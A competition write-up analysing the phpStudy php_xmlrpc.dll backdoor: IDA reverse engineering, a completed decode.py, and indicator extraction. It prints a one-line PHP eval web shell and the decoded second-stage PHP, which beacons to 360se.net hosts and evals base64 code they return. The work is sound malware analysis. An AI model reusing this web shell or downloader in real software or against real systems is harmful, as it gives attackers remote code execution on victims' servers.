Remote code execution penetration test / phpStudy backdoor vulnerability analysis (national secondary vocational network security competition, module B)
2022-07-05 05:32:00 【Ba1_ Ma0】
Brief introduction
Those who need the tools and environment can join group 809706080; if there is anything you do not understand you can also ask there, and I will answer as soon as I see it.

1. Find the file RCEBackdoor.zip in folder 1 on the target's desktop, analyse the program inside the archive with the static decompiler IDA, analyse the target file according to the prompts, and submit the address range (base address plus offset) that contains the malicious code as the flag (submission format: 0x1000XXXX-0x1000XXXX);
After logging on to the desktop and unzipping the archive, you can see the following files:

From my friend Yuze's article on middleware vulnerabilities and the PHP version bundled here, it can be guessed that this question is based on the phpStudy backdoor that was tested in previous years.
Yuze's article: https://blog.csdn.net/liufdfd/article/details/125507247?spm=1001.2014.3001.5501
The phpStudy backdoor lives in php_xmlrpc.dll under the ext extension folder of the bundled PHP 5.4.45 and PHP 5.2.17 in these releases:
- phpStudy 20180211: php5.4.45 and php5.2.17, ext\php_xmlrpc.dll
- phpStudy 20161103: php5.4.45 and php5.2.17, ext\php_xmlrpc.dll
Open that directory and locate the backdoored file:

Then drag the file into IDA Pro for analysis:


Press Shift+F12 to list the strings in the file; two suspicious strings stand out:

The first is the commonly used PHP "pony" (one-line web shell) code:
```php
<?php @eval($_POST['cmd']);?>
```
So this string can be judged to be the backdoor code. Next we follow its cross-references to reach the code that uses it: double-click the string,

then double-click the cross-reference to jump to the code that executes it:


This is where the code executes; press F5 to view the pseudocode of this function:

The question asks for the address range containing the malicious code, so we work backwards from the point where the malicious code is executed. The relevant part is this while loop:

The pseudocode leading up to the execution of the malicious code, with my reasoning in the comments:
```c
v10 = &byte_10011B34;          // output buffer for the rebuilt PHP string
v11 = asc_1000C028;            // start of the encoded blob (one byte per DWORD)
v41 = &byte_10011B34;
v12 = 0;                       // write index into the output buffer
v13 = asc_1000C028;
while ( 1 )
{
  if ( *(_DWORD *)v13 == 39 )  // 39 == '\'' : a single quote in the blob
  {
    v10[v12] = 92;             // 92 == '\\' : escape it for the PHP string literal
    v41[v12 + 1] = *v11;       // then copy the quote itself (the byte v11 points to)
    v12 += 2;
    v13 += 8;
  }
  else
  {
    v10[v12++] = *v11;         // ordinary byte: copy it as is
    v13 += 4;                  // advance to the next DWORD
  }
  v11 += 4;
  if ( (int)v11 >= (int)&unk_1000C66C ) // stop once v11 reaches the end of the blob at 0x1000C66C
    break;
  v10 = v41;
}
spprintf(&v41, 0, "@eval(%s('%s'));", aGzuncompress, v41); // wrap the rebuilt blob as @eval(gzuncompress('...')) into v41
```
I have only analysed the key parts; the rest of the code is not important here. From the analysis we can see that the key addresses are the start of the encoded data that v11 walks through (asc_1000C028) and the end address it is compared against in the if (unk_1000C66C).
The range containing the base-address offsets of the malicious code, submitted as the flag:
0x1000C028-0x1000C66C
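To make the loop above concrete, here is a Python reimplementation of what it and the spprintf() call do, followed by the reverse operation (what PHP's parser and gzuncompress() would do when the result is eval'd). This is an added example, not code from the article or from the sample; the DLL's real blob is not embedded, a constructed second stage is compressed with zlib at level 0 (stored blocks) so that its quote characters survive verbatim and the escaping branch is exercised.

```python
import zlib

QUOTE = 0x27      # the 39 compared in the decompiled loop: a single quote
BACKSLASH = 0x5C  # the 92 written in front of it

def expand_to_dwords(raw: bytes) -> bytes:
    """Lay out each byte as a little-endian DWORD, the layout the DLL's blob
    uses (the pseudocode reads *(_DWORD *)v13 and steps by 4)."""
    return b"".join(bytes((b, 0, 0, 0)) for b in raw)

def rebuild_payload(blob: bytes) -> bytes:
    """Reimplementation of the decompiled while-loop plus the spprintf() call:
    walk the DWORD array (asc_1000C028 .. unk_1000C66C in the sample), copy the
    low byte of every DWORD, prefix single quotes with a backslash, and format
    the result as @eval(gzuncompress('...'))."""
    out = bytearray()
    for pos in range(0, len(blob) - len(blob) % 4, 4):
        ch = int.from_bytes(blob[pos:pos + 4], "little")
        if ch == QUOTE:
            out += bytes((BACKSLASH, QUOTE))
        else:
            out.append(ch & 0xFF)
    return b"@eval(gzuncompress('" + bytes(out) + b"'));"

def php_single_quoted_unescape(s: bytes) -> bytes:
    """What the PHP parser does inside a single-quoted string: \\' becomes '
    and \\\\ becomes \\; every other backslash is kept literally."""
    out = bytearray()
    i = 0
    while i < len(s):
        if s[i] == BACKSLASH and i + 1 < len(s) and s[i + 1] in (QUOTE, BACKSLASH):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return bytes(out)

PREFIX = b"@eval(gzuncompress('"
SUFFIX = b"'));"

def recover_inner_php(payload: bytes) -> bytes:
    """Undo the wrapper the way eval() + gzuncompress() would: strip the
    literal wrapper, unescape the string literal, inflate with zlib
    (gzuncompress() consumes the same zlib format as zlib.decompress())."""
    if not (payload.startswith(PREFIX) and payload.endswith(SUFFIX)):
        raise ValueError("not an @eval(gzuncompress('...')) wrapper")
    literal = payload[len(PREFIX):-len(SUFFIX)]
    return zlib.decompress(php_single_quoted_unescape(literal))

def demo():
    # Constructed second stage, not the real sample's content.  Compression
    # level 0 emits stored blocks, so the two quote characters appear verbatim
    # in the compressed bytes and the escaping branch of the loop runs.
    inner = b"<?php echo 'hi'; ?>"
    blob = expand_to_dwords(zlib.compress(inner, 0))
    payload = rebuild_payload(blob)
    return inner, payload, recover_inner_php(payload)

if __name__ == "__main__":
    inner, payload, recovered = demo()
    print(payload)
    print(recovered == inner)
```

Note that the loop only escapes the single quote, not the backslash: a compressed blob containing the byte sequence `\'` or `\\` would not survive PHP's string parsing unchanged. decode.py sidesteps this entirely by stripping the three null padding bytes from the raw DWORD array instead of going through the PHP string literal.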
2. Continue analysing the decompiled code, find the key function in the malicious code, and submit the name of the function used for string concatenation as the flag; (submission format: echo())
This one is much easier; we continue the analysis in IDA:

We can see that the function used to concatenate the string is
spprintf
3. Continue analysing the decompiled code, find the key function in the malicious code, and submit the parameter name used to format the string as the flag; (submission format: %*)
The malicious code's format string is:
@eval(%s('%s'));
From this we can see that the parameter used to format the string is
%s
4. Continue analysing the decompiled code, find the key function in the malicious code, and submit the parameter name used for the string argument as the flag; (submission format: %*)
From the malicious code above and C's printf conventions, the parameter name for the string argument is
%s
5. Find the file decode.py in folder 1 on the target Windows 7 desktop and complete it: fill in the four blanks F1, F2, F3, F4 in the file, and submit the four strings joined together as the flag
Open decode.py:

The key lines containing F1, F2, F3 and F4:
```python
data = zlib.F1(data)
flag = b'F2'
hwrite.write(F3)
hwrite.write(F4)
#Flag=F1.F2.F3.F4
```
F1 is a function from Python's zlib module:
F1:
decompress
F2 is the value of the program's aGzuncompress variable;

double-click the variable to view it:

F2:
gzuncompress
The completed script, with the blanks filled in (the original file's code for reading the DLL is not shown in this article, so a command-line path is assumed here):
```python
import sys
import zlib
from hexdump import hexdump  # third-party package: pip install hexdump

# Assumption: the backdoored php_xmlrpc.dll path is passed on the command line
with open(sys.argv[1], "rb") as fh:
    data = fh.read()

flag = b'gzuncompress'                          # F2: the string at aGzuncompress
offset = data.find(flag)
# The encoded blob follows the marker string; each byte is stored as a
# 4-byte DWORD, so dropping the three null padding bytes recovers the raw bytes
data = data[offset + 0x10:offset + 0x10 + 0x567*4].replace(b"\x00\x00\x00", b"")
decodedata_1 = zlib.decompress(data[:0x191])    # F1: zlib.decompress, first zlib stream
hexdump(data[0x191:])                           # hexdump() prints and returns None
decodedata_2 = zlib.decompress(data[0x191:])    # second zlib stream
with open("compres_data1.txt", "w") as hwrite:  # the with-block closes the file
    hwrite.write(str(decodedata_1))             # F3
with open("compres_data2.txt", "w") as hwrite:
    hwrite.write(str(decodedata_2))             # F4
```

F3 and F4 are respectively:
str(decodedata_1) and str(decodedata_2)
The complete flag is:
decompress.gzuncompress.str(decodedata_1).str(decodedata_2)
6. Running decode.py produces two files. Analyse and decode the contents of the second file, and submit all port numbers in its port list sorted from small to large as the flag (e.g. 21,22,23,80);
After filling in the missing code and running the program, the second generated file contains the following:
```php
@ini_set("display_errors","0");
error_reporting(0);
function tcpGet($sendMsg = '', $ip = '360se.net', $port = '20123'){
    $result = "";
    $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,10);
    if( !$handle ){
        $handle = fsockopen($ip, intval($port), $errno, $errstr, 5);
        if( !$handle ){
            return "err";
        }
    }
    fwrite($handle, $sendMsg."\n");
    while(!feof($handle)){
        stream_set_timeout($handle, 2);
        $result .= fread($handle, 1024);
        $info = stream_get_meta_data($handle);
        if ($info['timed_out']) {
            break;
        }
    }
    fclose($handle);
    return $result;
}
$ds = array("www","bbs","cms","down","up","file","ftp");
$ps = array("20123","40125","8080","80","53");
$n = false;
do {
    $n = false;
    foreach ($ds as $d){
        $b = false;
        foreach ($ps as $p){
            $result = tcpGet($i,$d.".360se.net",$p);
            if ($result != "err"){
                $b =true;
                break;
            }
        }
        if ($b)break;
    }
    $info = explode("<^>",$result);
    if (count($info)==4){
        if (strpos($info[3],"/*Onemore*/") !== false){
            $info[3] = str_replace("/*Onemore*/","",$info[3]);
            $n=true;
        }
        @eval(base64_decode($info[3]));
    }
}while($n);
```
The port numbers in ascending order are:
53,80,8080,20123,40125
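The second stage above tries every `$ds` host under 360se.net against every `$ps` port, then eval()s the base64 in the fourth `<^>`-separated field of whatever answers. Beyond the sorted port list the question asks for, a responder will want the full set of host:port pairs to block and hunt for. The script below is an added example (not part of the article or the sample) that pulls both arrays out of the decoded file with a regular expression; the embedded input is a constructed excerpt copying the two array lines as printed above, and the functions work on the whole compres_data2.txt content in the same way.

```python
import re

# Constructed excerpt of the decoded second stage: the two array lines exactly
# as they appear in the decoded file.  Feed the full file content instead when
# working on a real decode.
SAMPLE_STAGE2 = r'''
$ds = array("www","bbs","cms","down","up","file","ftp");
$ps = array("20123","40125","8080","80","53");
'''

def php_string_array(src: str, name: str) -> list:
    """Return the string literals of a PHP statement  $name = array("a","b",...);"""
    m = re.search(r'\$' + re.escape(name) + r'\s*=\s*array\(([^)]*)\)', src)
    return re.findall(r'"([^"]*)"', m.group(1)) if m else []

def beacon_ports(src: str) -> list:
    """Ports from $ps, numerically sorted (the order the challenge asks for)."""
    return sorted(int(p) for p in php_string_array(src, "ps"))

def beacon_hosts(src: str, domain: str = "360se.net") -> list:
    """Host names the loop tries: each $ds entry prefixed to the C2 domain
    (the domain is hard-coded in the payload's tcpGet() call)."""
    return [f"{d}.{domain}" for d in php_string_array(src, "ds")]

def flag_value(src: str) -> str:
    """The flag for question 6: ascending ports joined with commas."""
    return ",".join(str(p) for p in beacon_ports(src))

def ioc_endpoints(src: str) -> list:
    """Every host:port pair the payload would connect to, in the order the
    nested foreach loops try them (outer loop: hosts, inner loop: ports as
    listed in $ps, i.e. not sorted)."""
    ports = php_string_array(src, "ps")
    return [f"{h}:{p}" for h in beacon_hosts(src) for p in ports]

if __name__ == "__main__":
    print("flag:", flag_value(SAMPLE_STAGE2))
    for endpoint in ioc_endpoints(SAMPLE_STAGE2):
        print(endpoint)
```

Because the first host:port that answers wins and the loop stops there, blocking a single endpoint is not enough; all 35 pairs need to be covered, and outbound connections to any of them from a phpStudy host are a strong indicator that the trojaned php_xmlrpc.dll is loaded.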
PoC exploitation
See the article written by Yuze, which covers the same question from the national secondary vocational network security module B under the name "middleware penetration testing":
https://blog.csdn.net/liufdfd/article/details/125507247?spm=1001.2014.3001.5502